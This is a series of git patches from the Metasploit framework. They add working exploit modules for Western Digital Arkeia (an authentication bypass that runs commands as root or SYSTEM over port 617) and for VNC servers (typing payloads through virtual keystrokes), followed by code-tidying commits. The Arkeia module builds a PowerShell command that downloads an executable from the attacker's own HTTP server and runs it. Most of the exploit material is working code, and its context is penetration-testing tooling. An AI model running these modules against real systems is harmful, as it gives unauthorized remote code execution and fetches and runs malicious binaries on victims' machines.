+    super(update_info(info,
+      'Name'        => 'WD Arkeia Remote Code Execution',
+      'Description' => %q{
+        This module exploits a code execution flaw in Western Digital Arkeia version 11.0.12 and below.
+        The vulnerability exists in the 'arkeiad' daemon listening on TCP port 617. Because there are
+        insufficient checks on the authentication of all clients, this can be bypassed.
+        Using the ARKFS_EXEC_CMD operation it's possible to execute arbitrary commands with root or
+        SYSTEM privileges.
+        The daemon is installed on both the Arkeia server as well on all the backup clients. The module
+        has been sucessfuly tested on Windows, Linux, OSX, FreeBSD and OpenBSD.
+      },
+      'Author'       =>
+        [
+          'xistence <xistence[at]0x90.nl>', # Vulnerability discovery and Metasploit module
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+        ],
+      'Privileged'  => true,
+      'Payload'     =>
+        {
+          'DisableNops' => true
+        },
+      'Targets'     =>
+        [
+          [ 'Windows',
+            {
+              'Arch' => ARCH_X86,
+              'Platform' => 'win',
+            }
+          ],
+          [ 'Linux',
+            {
+              'Arch' => ARCH_CMD,
+              'Platform' => 'unix',
+              'Payload' =>
+                {
+                  'Space'       => 255,
+                  'Compat'      => {
+                    'RequiredCmd' => 'perl python bash-tcp gawk openssl'
+                  }
+                }
+            }
+          ]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Jul 10 2015'))
+
+    register_options(
+      [
+        Opt::RPORT(617),
+        OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the payload request', 10])
+      ], self.class)
+  end
+
+  def check
+    connect
+
+    req = "\x00\x41"
+    req << "\x00" * 5
+    req << "\x73"
+    req << "\x00" * 12
+    req << "\xc0\xa8\x02\x74"
+    req << "\x00" * 56
+    req << "\x74\x02\xa8\xc0"
+    req << "ARKADMIN"
+    req << "\x00"
+    req << "root"
+    req << "\x00"
+    req << "root"
+    req << "\x00" * 3
+    req << "4.3.0-1" # version?
+    req << "\x00" * 11
+
+    sock.put(req)
+    res = sock.recv(1024)
+
+    unless res and res[0,4] == "\x00\x60\x00\x04"
+      disconnect
+      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure during agent communication #1")
+    end
+
+    req = "\x00\x73"
+    req << "\x00" * 5
+    req << "\x0c\x32"
+    req << "\x00" * 11
+
+    sock.put(req)
+    res = sock.recv(1024)
+
+    unless res and res[0,4] == "\x00\x60\x00\x04"
+      disconnect
+      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure during agent communication #2")
+    end
+
+    req = "\x00\x61\x00\x04\x00\x01\x00\x11\x00\x00\x31\x00"
+    req << "EN" # Language
+    req << "\x00" * 11
+
+    sock.put(req)
+    res = sock.recv(1024)
+
+    unless res and res == "\x00\x43\x00\x00\x00\x01\x00\x00"
+      disconnect
+      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure during agent communication #3")
+    end
+
+    # ARKADMIN_GET_CLIENT_INFO
+    req = "\x00\x62\x00\x01"
+    req << "\x00" * 3
+    req << "\x26"
+    req << "ARKADMIN_GET_CLIENT_INFO" # Function to request agent information
+    req << "\x00\x32\x38"
+    req << "\x00" * 11
+
+    sock.put(req)
+    res = sock.recv(1024)
+
+    unless res and res == "\x00\x43\x00\x00\x00\x02\x00\x00"
+      disconnect
+      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure during agent communication #3")
+    end
+
+    req = "\x00\x63\x00\x04\x00\x00\x00\x12\x30\x00\x31\x00\x32\x38"
+    req << "\x00" * 12
+
+    sock.put(req)
+    # Have to retrieve data twice
+    sock.recv(1024)
+    res = sock.recv(1024)
+
+    if res and res =~ /VERSION.*WD Arkeia ([0-9]+\.[0-9]+\.[0-9]+)/
+      version = $1
+      print_status("#{rhost}:#{rport} - Arkeia version detected: #{version}")
+      if version <= "11.0.12"
+        return Exploit::CheckCode::Vulnerable
+      end
+    else
+      print_status("#{rhost}:#{rport} - Arkeia version not detected")
+    end
+
+    return Exploit::CheckCode::Safe
+  end
+
+  def exploit
+
+    if target.name =~ /Windows/
+
+      @downfile = rand_text_alpha(8+rand(8))
+      @pl = generate_payload_exe
+
+      srv_host = Rex::Socket.source_address(rhost)
+
+      service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + '/' + @downfile
+      print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...")
+      start_service({'Uri' => {
+        'Proc' => Proc.new { |cli, req|
+          on_request_uri(cli, req)
+        },
+        'Path' => '/' + @downfile
+      }})
+
+      # PowerShell web download. The char replacement is needed because using the "/" character twice (like http://) directly is not possible on Windows agents.
+      command = "PowerShell -Command \"$s=[CHAR][BYTE]47;$b=\\\"http:$($s)$($s)#{srv_host}:#{datastore['SRVPORT']}$($s)#{@downfile}\\\";"
+      command << "(New-Object System.Net.WebClient).DownloadFile($b,'c:/#{@downfile}.exe');"
+      command << "(New-Object -com Shell.Application).ShellExecute('c:/#{@downfile}.exe');\""
+
+      communicate(command)
+
+    elsif target.name =~ /Linux/
+      communicate(payload.encoded)
+      return
+    end
+  end
+
+
+  def communicate(command)
+      print_status("#{rhost}:#{rport} - Connecting to Arkeia daemon")
+
+      connect
+
+      print_status("#{rhost}:#{rport} - Sending agent communication")
+
+      req = "\x00\x41\x00\x00\x00\x00\x00\x70"
+      req << "\x00" * 12
+      req << "\xc0\xa8\x02\x8a"
+      req << "\x00" * 56
+      req << "\x8a\x02\xa8\xc0"
+      req << "ARKFS"
+      req << "\x00"
+      req << "root"
+      req << "\x00"
+      req << "root"
+      req << "\x00" * 3
+      req << "4.3.0-1" # Client version ?
+      req << "\x00" * 11
+
+      sock.put(req)
+      res = sock.recv(1024)
+
+      unless res and res[0,4] == "\x00\x60\x00\x04"
+        disconnect
+        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure during agent communication #1")
+      end
+
+      req = "\x00\x73\x00\x00\x00\x00\x00\x0c\x32"
+      req << "\x00" * 11
+
+      sock.put(req)
+      res = sock.recv(1024)
+
+      unless res and res[0,4] == "\x00\x60\x00\x04"
+        disconnect
+        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure during agent communication #2")
+      end
+
+      req = "\x00\x61\x00\x04\x00\x01\x00\x1a\x00\x00"
+      req << rand_text_numeric(10) # "1234567890" - 10 byte numerical value, like a session ID?
+      req << "\x00"
+      req << "EN" # English language?
+      req << "\x00" * 11
+
+      sock.put(req)
+      res = sock.recv(1024)
+
+      unless res and res == "\x00\x43\x00\x00\x00\x01\x00\x00"
+        disconnect
+        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure during agent communication #3")
+      end
+
+      req = "\x00\x62\x00\x01\x00\x02\x00\x1b"
+      req << "ARKFS_EXEC_CMD" # With this function we can execute system commands with root/SYSTEM privileges
+      req << "\x00\x31"
+      req << "\x00" * 11
+
+      sock.put(req)
+      res = sock.recv(1024)
+
+      unless res and res == "\x00\x43\x00\x00\x00\x02\x00\x00"
+        disconnect
+        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure during agent communication #4")
+      end
+
+
+      commandlength = "%02x" % command.length
+      commandlength = commandlength.scan(/../).map { |x| x.hex.chr }.join
+
+      req = "\x00\x63\x00\x04\x00\x03\x00\x15\x31\x00\x31\x00\x31\x00\x30\x3a\x31\x2c"
+      req << "\x00" * 12
+      req << "\x64\x00\x04\x00\x04\x00"
+      req << commandlength # Maximum length can be 255 bytes (0xFF)
+      req << command # Our command to be executed
+      req << "\x00"
+
+      print_status("#{rhost}:#{rport} - Executing payload through ARKFS_EXEC_CMD")
+
+      sock.put(req)
+      res = sock.recv(1024)
+
+      unless res and res[0,4] == "\x00\x63\x00\x04"
+        disconnect
+        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure executing payload")
+      end
+
+
+      # Wait for our payload to be sent, else HTTP server might shutdown too quick
+      select(nil, nil, nil, datastore['HTTP_DELAY'])
+
+  end
+
+  def on_request_uri(cli, request)
+    if (not @pl)
+      print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
+      return
+    end
+    print_status("#{rhost}:#{rport} - Sending the payload to the server...")
+    register_files_for_cleanup("c:\\#{@downfile}.exe")
+    send_response(cli, @pl)
+  end
+
+end

From 51f59b3c8cc658699c6b5e4575f16dca4e05f051 Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Fri, 10 Jul 2015 16:19:46 +1000
Subject: [PATCH 0691/1013] Re-add URI generation to reverse_http

---
 lib/msf/core/payload/windows/reverse_http.rb | 1 +
 1 file changed, 1 insertion(+)

diff --git a/lib/msf/core/payload/windows/reverse_http.rb b/lib/msf/core/payload/windows/reverse_http.rb
index f29662d6fa..b47015f67b 100644
--- a/lib/msf/core/payload/windows/reverse_http.rb
+++ b/lib/msf/core/payload/windows/reverse_http.rb
@@ -51,6 +51,7 @@ module Payload::Windows::ReverseHttp
 
     # Add extra options if we have enough space
     unless self.available_space.nil? || required_space > self.available_space
+      conf[:url]        = generate_uri
       conf[:exitfunk]   = datastore['EXITFUNC']
       conf[:ua]         = datastore['MeterpreterUserAgent']
       conf[:proxy_host] = datastore['PayloadProxyHost']

From 85769808ccb75f5f4724fb2e31a74dad2c1ef537 Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Fri, 10 Jul 2015 16:28:20 +1000
Subject: [PATCH 0692/1013] Update metasploit payloads to 1.0.6

---
 Gemfile.lock                 | 4 ++--
 metasploit-framework.gemspec | 2 +-
 2 files changed, 3 insertions(+), 3 deletions(-)

diff --git a/Gemfile.lock b/Gemfile.lock
index 219a800392..5daa50130d 100644
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -9,7 +9,7 @@ PATH
       json
       metasploit-concern (= 1.0.0)
       metasploit-model (= 1.0.0)
-      metasploit-payloads (= 1.0.4)
+      metasploit-payloads (= 1.0.6)
       msgpack
       nokogiri
       packetfu (= 1.1.9)
@@ -123,7 +123,7 @@ GEM
       activemodel (>= 4.0.9, < 4.1.0)
       activesupport (>= 4.0.9, < 4.1.0)
       railties (>= 4.0.9, < 4.1.0)
-    metasploit-payloads (1.0.4)
+    metasploit-payloads (1.0.6)
     metasploit_data_models (1.2.5)
       activerecord (>= 4.0.9, < 4.1.0)
       activesupport (>= 4.0.9, < 4.1.0)
diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec
index a9808136ab..99789ed0b4 100644
--- a/metasploit-framework.gemspec
+++ b/metasploit-framework.gemspec
@@ -62,7 +62,7 @@ Gem::Specification.new do |spec|
   # are needed when there's no database
   spec.add_runtime_dependency 'metasploit-model', '1.0.0'
   # Needed for Meterpreter
-  spec.add_runtime_dependency 'metasploit-payloads', '1.0.4'
+  spec.add_runtime_dependency 'metasploit-payloads', '1.0.6'
   # Needed by msfgui and other rpc components
   spec.add_runtime_dependency 'msgpack'
   # Needed by anemone crawler

From b916a9d267363d212cc4dc990e772ae80bc5b7f1 Mon Sep 17 00:00:00 2001
From: xistence <xistence@0x90.nl>
Date: Fri, 10 Jul 2015 14:08:32 +0700
Subject: [PATCH 0693/1013] VNC Keyboard Exec

---
 .../exploits/multi/vnc/vnc_keyboard_exec.rb   | 197 ++++++++++++++++++
 1 file changed, 197 insertions(+)
 create mode 100644 modules/exploits/multi/vnc/vnc_keyboard_exec.rb

diff --git a/modules/exploits/multi/vnc/vnc_keyboard_exec.rb b/modules/exploits/multi/vnc/vnc_keyboard_exec.rb
new file mode 100644
index 0000000000..6d103d0185
--- /dev/null
+++ b/modules/exploits/multi/vnc/vnc_keyboard_exec.rb
@@ -0,0 +1,197 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex/proto/rfb'
+
+class Metasploit3 < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::Powershell
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'            => 'VNC Keyboard Exec',
+      'Description'     => %q{
+        This module exploits VNC servers by sending virtual keyboard keys and executing
+        a payload. On Windows systems a command prompt is opened and a PowerShell or CMDStager
+        payload is typed and executed. On Unix/Linux systems a xterm terminal is opened
+        and a payload is typed and executed.
+      },
+      'Author'          => [ 'xistence <xistence[at]0x90.nl>' ],
+      'Privileged'      => false,
+      'License'         => MSF_LICENSE,
+      'Platform'       => %w{ win unix },
+      'Arch'            => ARCH_X86,
+      'Targets'         =>
+        [
+          [ 'VNC Windows / Powershell', { 'Platform' => 'win' } ],
+          [ 'VNC Windows / VBScript CMDStager', { 'Platform' => 'win' } ],
+          [ 'VNC Linux / Unix', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ]
+        ],
+      'DisclosureDate'  => 'Jul 10 2015',
+      'DefaultTarget'   => 0))
+
+    register_options(
+      [
+        Opt::RPORT(5900),
+        OptString.new('PASSWORD', [ false, 'The VNC password']),
+        OptInt.new('TIMEWAIT', [ true, 'Time to wait for payload to be executed', 20])
+      ], self.class)
+  end
+
+
+  def press_key( key )
+    keyboard_key = "\x04\x01" # Press key
+    keyboard_key << "\x00\x00\x00\x00" # Unknown / Unused data
+    keyboard_key << key # The keyboard key
+    # Press the keyboard key. Note: No receive is done as everything is sent in one long data stream
+    sock.put(keyboard_key)
+  end
+
+
+  def release_key( key )
+    keyboard_key = "\x04\x00" # Release key
+    keyboard_key << "\x00\x00\x00\x00" # Unknown / Unused data
+    keyboard_key << key # The keyboard key
+    # Press the keyboard key. Note: No receive is done as everything is sent in one long data stream
+    sock.put(keyboard_key)
+  end
+
+
+  def exec_command( command )
+    values = command.chars.to_a
+    values.each do |value|
+      press_key("\x00#{value}")
+      release_key("\x00#{value}")
+    end
+    press_key(@enter_key)
+  end
+
+
+  def start_cmdprompt
+    print_status("#{rhost}:#{rport} - Opening Run command")
+    # Pressing and holding windows key for 1 second
+    press_key(@windows_key)
+    select(nil, nil, nil, 1)
+    # Press the "r" key
+    press_key("\x00r")
+    # Now we can release both keys again
+    release_key("\x00r")
+    release_key(@windows_key)
+    # Wait a second to open run command window
+    select(nil, nil, nil, 1)
+    exec_command("cmd.exe")
+    # Wait a second for cmd.exe prompt to open
+    select(nil, nil, nil, 1)
+  end
+
+
+  def exploit
+
+    begin
+
+      @enter_key = "\xff\x0d"
+      @windows_key = "\xff\xeb"
+      alt_key = "\xff\xe9"
+      f2_key = "\xff\xbf"
+      password = datastore['PASSWORD']
+
+      connect
+      vnc = Rex::Proto::RFB::Client.new(sock, :allow_none => false)
+
+      unless vnc.handshake
+        print_error("#{rhost}:#{rport} - #{vnc.error}")
+        return
+      end
+
+      unless password.nil?
+        print_status("#{rhost}:#{rport} - Trying to authenticate against VNC server")
+        if vnc.authenticate(password)
+          print_status("#{rhost}:#{rport} - Authenticated")
+        else
+          print_error("#{rhost}:#{rport} - #{vnc.error}")
+          return
+        end
+      else
+        print_status("#{rhost}:#{rport} - Bypass authentication")
+        # The following byte is sent in case the VNC server end doesn't require authentication (empty password)
+        sock.put("\x10")
+      end
+
+
+
+      # Send shared desktop
+      unless vnc.send_client_init
+        print_error("#{rhost}:#{rport} - #{vnc.error}")
+        return
+      end
+
+      if target.name =~ /VBScript CMDStager/
+
+        start_cmdprompt
+        print_status("#{rhost}:#{rport} - Typing and executing payload")
+        execute_cmdstager({:flavor => :vbs, :linemax => 8100})
+
+        # Exit the CMD prompt
+        exec_command("exit")
+
+      elsif target.name =~ /Powershell/
+
+        start_cmdprompt
+        print_status("#{rhost}:#{rport} - Typing and executing payload")
+        command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {:remove_comspec => true, :encode_final_payload => true})
+        # Execute powershell payload and make sure we exit our CMD prompt
+        exec_command("#{command} && exit")
+
+      elsif target.name =~ /Linux/
+
+        print_status("#{rhost}:#{rport} - Opening \"Run Application\"")
+        # Press the ALT key and hold it for a second
+        press_key(alt_key)
+        select(nil, nil, nil, 1)
+
+        # Press F2 to start up "Run application"
+        press_key(f2_key)
+
+        # Release ALT + F2
+        release_key(alt_key)
+        release_key(f2_key)
+
+        # Wait a second for "Run application" to start
+        select(nil, nil, nil, 1)
+
+        # Start a xterm window
+        print_status("#{rhost}:#{rport} - Opening xterm")
+        exec_command("xterm")
+
+        # Wait a second for "xterm" to start
+        select(nil, nil, nil, 1)
+
+        # Execute our payload and exit (close) the xterm window
+        print_status("#{rhost}:#{rport} - Typing and executing payload")
+        exec_command("nohup #{payload.encoded} &")
+        exec_command("exit")
+      end
+
+      # Wait up to X seconds, else might timeout/disconnect before full payload is typed
+      select(nil, nil, nil, datastore['TIMEWAIT'])
+
+      handler
+    rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout => e
+      print_error("#{rhost}:#{rport} - #{e.message}")
+    ensure
+      disconnect
+    end
+  end
+
+  def execute_command(cmd, opts = {})
+      exec_command(cmd)
+  end
+
+end
+

From f66cf916762b2c803ca8625b0c2ce63bca972b8f Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 10 Jul 2015 10:33:02 -0500
Subject: [PATCH 0694/1013] Fix metadata

---
 modules/exploits/multi/misc/arkeia_agent_exec.rb | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)

diff --git a/modules/exploits/multi/misc/arkeia_agent_exec.rb b/modules/exploits/multi/misc/arkeia_agent_exec.rb
index 8be8764850..5d324b5f30 100644
--- a/modules/exploits/multi/misc/arkeia_agent_exec.rb
+++ b/modules/exploits/multi/misc/arkeia_agent_exec.rb
@@ -24,11 +24,11 @@ class Metasploit3 < Msf::Exploit::Remote
         Using the ARKFS_EXEC_CMD operation it's possible to execute arbitrary commands with root or
         SYSTEM privileges.
         The daemon is installed on both the Arkeia server as well on all the backup clients. The module
-        has been sucessfuly tested on Windows, Linux, OSX, FreeBSD and OpenBSD.
+        has been successfully tested on Windows, Linux, OSX, FreeBSD and OpenBSD.
       },
       'Author'       =>
         [
-          'xistence <xistence[at]0x90.nl>', # Vulnerability discovery and Metasploit module
+          'xistence <xistence[at]0x90.nl>' # Vulnerability discovery and Metasploit module
         ],
       'License'     => MSF_LICENSE,
       'References'  =>
@@ -55,6 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote
                 {
                   'Space'       => 255,
                   'Compat'      => {
+                    'PayloadType' => 'cmd cmd_bash',
                     'RequiredCmd' => 'perl python bash-tcp gawk openssl'
                   }
                 }

From 2c7cc83e383f3397c16d642ca19a86cb13d3072f Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 10 Jul 2015 10:34:47 -0500
Subject: [PATCH 0695/1013] Use single quotes

---
 .../exploits/multi/misc/arkeia_agent_exec.rb  | 30 +++++++++----------
 1 file changed, 15 insertions(+), 15 deletions(-)

diff --git a/modules/exploits/multi/misc/arkeia_agent_exec.rb b/modules/exploits/multi/misc/arkeia_agent_exec.rb
index 5d324b5f30..9462048938 100644
--- a/modules/exploits/multi/misc/arkeia_agent_exec.rb
+++ b/modules/exploits/multi/misc/arkeia_agent_exec.rb
@@ -82,14 +82,14 @@ class Metasploit3 < Msf::Exploit::Remote
     req << "\xc0\xa8\x02\x74"
     req << "\x00" * 56
     req << "\x74\x02\xa8\xc0"
-    req << "ARKADMIN"
+    req << 'ARKADMIN'
     req << "\x00"
-    req << "root"
-    req << "\x00"
-    req << "root"
+    req << 'root'
+    req << '\x00'
+    req << 'root'
     req << "\x00" * 3
-    req << "4.3.0-1" # version?
-    req << "\x00" * 11
+    req << '4.3.0-1' # version?
+    req << '\x00' * 11
 
     sock.put(req)
     res = sock.recv(1024)
@@ -125,10 +125,10 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     # ARKADMIN_GET_CLIENT_INFO
-    req = "\x00\x62\x00\x01"
+    req = '\x00\x62\x00\x01'
     req << "\x00" * 3
     req << "\x26"
-    req << "ARKADMIN_GET_CLIENT_INFO" # Function to request agent information
+    req << 'ARKADMIN_GET_CLIENT_INFO' # Function to request agent information
     req << "\x00\x32\x38"
     req << "\x00" * 11
 
@@ -205,13 +205,13 @@ class Metasploit3 < Msf::Exploit::Remote
       req << "\xc0\xa8\x02\x8a"
       req << "\x00" * 56
       req << "\x8a\x02\xa8\xc0"
-      req << "ARKFS"
+      req << 'ARKFS'
       req << "\x00"
-      req << "root"
+      req << 'root'
       req << "\x00"
-      req << "root"
+      req << 'root'
       req << "\x00" * 3
-      req << "4.3.0-1" # Client version ?
+      req << '4.3.0-1' # Client version ?
       req << "\x00" * 11
 
       sock.put(req)
@@ -236,7 +236,7 @@ class Metasploit3 < Msf::Exploit::Remote
       req = "\x00\x61\x00\x04\x00\x01\x00\x1a\x00\x00"
       req << rand_text_numeric(10) # "1234567890" - 10 byte numerical value, like a session ID?
       req << "\x00"
-      req << "EN" # English language?
+      req << 'EN' # English language?
       req << "\x00" * 11
 
       sock.put(req)
@@ -248,7 +248,7 @@ class Metasploit3 < Msf::Exploit::Remote
       end
 
       req = "\x00\x62\x00\x01\x00\x02\x00\x1b"
-      req << "ARKFS_EXEC_CMD" # With this function we can execute system commands with root/SYSTEM privileges
+      req << 'ARKFS_EXEC_CMD' # With this function we can execute system commands with root/SYSTEM privileges
       req << "\x00\x31"
       req << "\x00" * 11
 
@@ -261,7 +261,7 @@ class Metasploit3 < Msf::Exploit::Remote
       end
 
 
-      commandlength = "%02x" % command.length
+      commandlength = '%02x' % command.length
       commandlength = commandlength.scan(/../).map { |x| x.hex.chr }.join
 
       req = "\x00\x63\x00\x04\x00\x03\x00\x15\x31\x00\x31\x00\x31\x00\x30\x3a\x31\x2c"

From 34a6984c1d8773b74ad51b1e760ec0358902c0a8 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 10 Jul 2015 10:44:38 -0500
Subject: [PATCH 0696/1013] Fix variable name

---
 modules/exploits/multi/misc/arkeia_agent_exec.rb | 12 ++++++------
 1 file changed, 6 insertions(+), 6 deletions(-)

diff --git a/modules/exploits/multi/misc/arkeia_agent_exec.rb b/modules/exploits/multi/misc/arkeia_agent_exec.rb
index 9462048938..98a9fb4c33 100644
--- a/modules/exploits/multi/misc/arkeia_agent_exec.rb
+++ b/modules/exploits/multi/misc/arkeia_agent_exec.rb
@@ -113,7 +113,7 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     req = "\x00\x61\x00\x04\x00\x01\x00\x11\x00\x00\x31\x00"
-    req << "EN" # Language
+    req << 'EN' # Language
     req << "\x00" * 11
 
     sock.put(req)
@@ -125,7 +125,7 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     # ARKADMIN_GET_CLIENT_INFO
-    req = '\x00\x62\x00\x01'
+    req = "\x00\x62\x00\x01"
     req << "\x00" * 3
     req << "\x26"
     req << 'ARKADMIN_GET_CLIENT_INFO' # Function to request agent information
@@ -261,13 +261,13 @@ class Metasploit3 < Msf::Exploit::Remote
       end
 
 
-      commandlength = '%02x' % command.length
-      commandlength = commandlength.scan(/../).map { |x| x.hex.chr }.join
+      command_length = '%02x' % command.length
+      command_length = command_length.scan(/../).map { |x| x.hex.chr }.join
 
       req = "\x00\x63\x00\x04\x00\x03\x00\x15\x31\x00\x31\x00\x31\x00\x30\x3a\x31\x2c"
       req << "\x00" * 12
       req << "\x64\x00\x04\x00\x04\x00"
-      req << commandlength # Maximum length can be 255 bytes (0xFF)
+      req << command_length # Maximum length can be 255 bytes (0xFF)
       req << command # Our command to be executed
       req << "\x00"
 
@@ -288,7 +288,7 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def on_request_uri(cli, request)
-    if (not @pl)
+    unless @pl
       print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
       return
     end

From c70be6451770417a896b7b2f53300561c1988c1d Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 10 Jul 2015 10:57:55 -0500
Subject: [PATCH 0697/1013] Fix version check

---
 .../exploits/multi/misc/arkeia_agent_exec.rb  | 19 ++++++++++---------
 1 file changed, 10 insertions(+), 9 deletions(-)

diff --git a/modules/exploits/multi/misc/arkeia_agent_exec.rb b/modules/exploits/multi/misc/arkeia_agent_exec.rb
index 98a9fb4c33..04b77bd646 100644
--- a/modules/exploits/multi/misc/arkeia_agent_exec.rb
+++ b/modules/exploits/multi/misc/arkeia_agent_exec.rb
@@ -85,11 +85,11 @@ class Metasploit3 < Msf::Exploit::Remote
     req << 'ARKADMIN'
     req << "\x00"
     req << 'root'
-    req << '\x00'
+    req << "\x00"
     req << 'root'
     req << "\x00" * 3
     req << '4.3.0-1' # version?
-    req << '\x00' * 11
+    req << "\x00" * 11
 
     sock.put(req)
     res = sock.recv(1024)
@@ -148,17 +148,18 @@ class Metasploit3 < Msf::Exploit::Remote
     sock.recv(1024)
     res = sock.recv(1024)
 
-    if res and res =~ /VERSION.*WD Arkeia ([0-9]+\.[0-9]+\.[0-9]+)/
+    if res && res =~ /VERSION.*WD Arkeia ([0-9]+\.[0-9]+\.[0-9]+)/
       version = $1
-      print_status("#{rhost}:#{rport} - Arkeia version detected: #{version}")
-      if version <= "11.0.12"
-        return Exploit::CheckCode::Vulnerable
+      vprint_status("#{rhost}:#{rport} - Arkeia version detected: #{version}")
+      if Gem::Version.new(version) <= Gem::Version.new('11.0.12')
+        return Exploit::CheckCode::Appears
+      else
+        return Exploit::CheckCode::Safe
       end
     else
-      print_status("#{rhost}:#{rport} - Arkeia version not detected")
+      vprint_status("#{rhost}:#{rport} - Arkeia version not detected")
+      return Exploit::CheckCode::Unknown
     end
-
-    return Exploit::CheckCode::Safe
   end
 
   def exploit

From cf4b18700d3c86b82c95bf2712b7e2e231d83f72 Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Fri, 10 Jul 2015 11:14:59 -0500
Subject: [PATCH 0698/1013] Fix CVE reference

---
 .../auxiliary/scanner/http/accellion_fta_statecode_file_read.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/auxiliary/scanner/http/accellion_fta_statecode_file_read.rb b/modules/auxiliary/scanner/http/accellion_fta_statecode_file_read.rb
index b59839cd19..f3badecf8d 100644
--- a/modules/auxiliary/scanner/http/accellion_fta_statecode_file_read.rb
+++ b/modules/auxiliary/scanner/http/accellion_fta_statecode_file_read.rb
@@ -29,7 +29,7 @@ class Metasploit3 < Msf::Auxiliary
       'References'     =>
         [
           ['URL', 'http://r-7.co/R7-2015-08'],
-          ['CVE', '2015-2857']
+          ['CVE', '2015-2856']
         ],
       'DisclosureDate' => 'Jul 10 2015'
     ))

From 3495d317b5f5e5537f6ba33218cff43efa7f1af9 Mon Sep 17 00:00:00 2001
From: Brent Cook <bcook@rapid7.com>
Date: Fri, 10 Jul 2015 11:17:31 -0500
Subject: [PATCH 0699/1013] Do not lock SMTP STARTTLS to only use SSLv3

SSLv3 has been deprecated for some time, and is being actively disabled more
and more (http://disablessl3.com, https://tools.ietf.org/html/rfc7568).

To maintain forward compatibility, do not specify a maximum version
and insteady use the default from the local OpenSSL library instead. Fallbacks
to older versions will happen on handshake as needed.
---
 lib/msf/core/exploit/smtp_deliver.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/msf/core/exploit/smtp_deliver.rb b/lib/msf/core/exploit/smtp_deliver.rb
index 0dec10cc71..bb50767bc2 100644
--- a/lib/msf/core/exploit/smtp_deliver.rb
+++ b/lib/msf/core/exploit/smtp_deliver.rb
@@ -229,7 +229,7 @@ protected
   end
 
   def generate_ssl_context
-    ctx = OpenSSL::SSL::SSLContext.new(:SSLv3)
+    ctx = OpenSSL::SSL::SSLContext.new
     ctx.key = OpenSSL::PKey::RSA.new(1024){ }
 
     ctx.session_id_context = Rex::Text.rand_text(16)

From 728b338593c6a41ed185fffa7146be39792292ae Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Fri, 10 Jul 2015 11:28:10 -0500
Subject: [PATCH 0700/1013] Give msftidy a cookie

---
 .../auxiliary/scanner/http/accellion_fta_statecode_file_read.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/auxiliary/scanner/http/accellion_fta_statecode_file_read.rb b/modules/auxiliary/scanner/http/accellion_fta_statecode_file_read.rb
index f3badecf8d..bb63c2a7d3 100644
--- a/modules/auxiliary/scanner/http/accellion_fta_statecode_file_read.rb
+++ b/modules/auxiliary/scanner/http/accellion_fta_statecode_file_read.rb
@@ -12,7 +12,7 @@ class Metasploit3 < Msf::Auxiliary
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Accellion FTA statecode Cookie Arbitrary File Read',
+      'Name'           => "Accellion FTA 'statecode' Cookie Arbitrary File Read",
       'Description'    => %q{
           This module exploits a file disclosure vulnerability in the Accellion
         File Transfer appliance. This vulnerability is triggered when a user-provided

From 9ba515f1857959e050fb103c9d6d83862f9ae0b7 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 10 Jul 2015 11:32:49 -0500
Subject: [PATCH 0701/1013] Fix network communication on `check`

* Some protocol handling just to not read amounts of data blindly
---
 .../exploits/multi/misc/arkeia_agent_exec.rb  | 180 ++++++++++++++++--
 1 file changed, 162 insertions(+), 18 deletions(-)

diff --git a/modules/exploits/multi/misc/arkeia_agent_exec.rb b/modules/exploits/multi/misc/arkeia_agent_exec.rb
index 04b77bd646..4c71953dcd 100644
--- a/modules/exploits/multi/misc/arkeia_agent_exec.rb
+++ b/modules/exploits/multi/misc/arkeia_agent_exec.rb
